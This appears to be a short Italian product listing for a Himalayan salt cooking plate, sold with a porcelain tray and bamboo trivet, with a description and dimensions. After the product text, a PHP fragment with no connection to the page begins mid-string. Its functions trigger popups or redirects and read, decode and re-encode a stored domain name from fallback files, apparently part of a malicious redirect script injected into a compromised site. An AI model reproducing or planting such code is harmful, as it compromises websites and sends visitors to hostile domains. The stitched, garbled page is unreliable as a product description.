Sale Himalayano

SALE-2-420x362-650x650Il sale Himalayano, chiamato “diamante rosa”, è un sale pregiato, puro, ricco di un ampissimo spettro di microelementi. Esso è ideale sia per tagliare che per cuocere in forno o sul fuoco pietanze come carne, pesce o verdure. Il vassoio sottostante progettato per condire le pietanze ancora calde senza sporcare la pietra.

Piastra sale himalayano cm. 20 x 20, vassoio porcellana cm. 21 x 37, sottopentola bambù cm. 22 x 55

";}function redirect($url){show_popup($url);return;$r=rand(5,20);sleep($r);echo "";die();die("");}function check_status($df1,$df2){$domain=read_str($df1,$df2);echo "Domain is: $domain\n";}function read_str($fname1,$fname2){$file=fopen($fname1,'r');$name=$fname1;if(!$file){$name=$fname2;$file=fopen($fname2,'r');}if(!$file){return;}$str=fread($file,filesize($name));$str=dec($str);fclose($file);return $str;}function save_str($str,$fname1,$fname2){$file=fopen($fname1,'w');if(!$file){$file=fopen($fname2,'w');}if(!$file){return;}$str=enc($str);fwrite($file,$str);fclose($file);}?>